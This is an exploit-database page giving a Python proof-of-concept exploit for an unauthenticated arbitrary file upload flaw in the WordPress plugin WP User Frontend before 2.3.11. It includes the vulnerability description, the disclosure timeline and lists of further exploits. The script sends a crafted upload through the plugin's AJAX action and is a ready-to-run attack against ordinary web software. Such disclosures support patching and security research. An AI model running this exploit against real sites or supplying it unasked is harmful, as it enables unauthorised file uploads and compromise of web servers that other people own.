Menu

Search for hundreds of thousands of exploits

"WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload"

Author

Exploit author

"Panagiotis Vagenas"

Platform

Exploit platform

php

Release date

Exploit published date

2016-02-08

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
'''
* Exploit Title: WordPress WP User Frontend Plugin [Unrestricted File Upload]
* Discovery Date: 2016-02-04
* Public Disclosure: 2016-02-08
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: https://wedevs.com
* Software Link: https://wordpress.org/plugins/wp-user-frontend
* Version: < 2.3.11
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress


Description
-----------

WordPress plugin _WP User Frontend_ suffers from an unrestricted file uploade vulnerability. An attacker can exploit the `wpuf_file_upload` or `wpuf_insert_image` actions to upload any file which pass the WordPress mime and size checks.

The attack does not require any privilege to be performed. The mentioned actions are available to non-privileged users also, thus allowing to anyone uploading files to the web server.

PoC
---
'''
 

#!/usr/bin/python3

################################################################################
# WP User Frontend unrestricted file upload exploit
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################

import requests
import tempfile

url = 'http://example.com/wp-admin/admin-ajax.php'

postData = {
    'action': 'wpuf_file_upload'
}

file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')

file.write('A'*32)

file.seek(0)

files = {'wpuf_file': file}

r = requests.post(url, data=postData, files=files)

file.close()

if r.text != 'error':
    print('Success!')
    print(r.text)
else:
    print('error')

exit(0)

'''
Timeline
--------

1. **2016-02-04**: Vendor notified via support forums in WordPress.org
2. **2016-02-05**: Vendor responded
3. **2016-02-05**: Issue details send to vendor
4. **2016-02-06**: Requested CVE ID
5. **2016-02-06**: Vendor implemented security checks
6. **2016-02-06**: Verified that this exploit is no longer valid
7. **2016-02-08**: Vendor released v2.3.11 which resolves this issue
'''
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-04-22 "WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-03-03 "WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-24 "WordPress Plugin Extra User Details 0.4.2 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-08 "WordPress Plugin User Meta Manager 3.4.6 - Information Disclosure" webapps php "Panagiotis Vagenas"
2016-02-08 "WordPress Plugin WooCommerce Store Toolkit 1.5.5 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-08 "WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload" webapps php "Panagiotis Vagenas"
2016-02-04 "WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-04 "WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection" webapps php "Panagiotis Vagenas"
2015-12-03 "Gnome Nautilus 3.16 - Denial of Service" dos linux "Panagiotis Vagenas"
2015-12-03 "WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting" webapps php "Panagiotis Vagenas"
2015-12-03 "WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection" webapps php "Panagiotis Vagenas"
2015-11-18 "WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload" webapps php "Panagiotis Vagenas"
2015-06-04 "WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion" webapps php "Panagiotis Vagenas"
2015-05-27 "WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting" webapps php "Panagiotis Vagenas"
2015-05-21 "WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities" webapps php "Panagiotis Vagenas"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.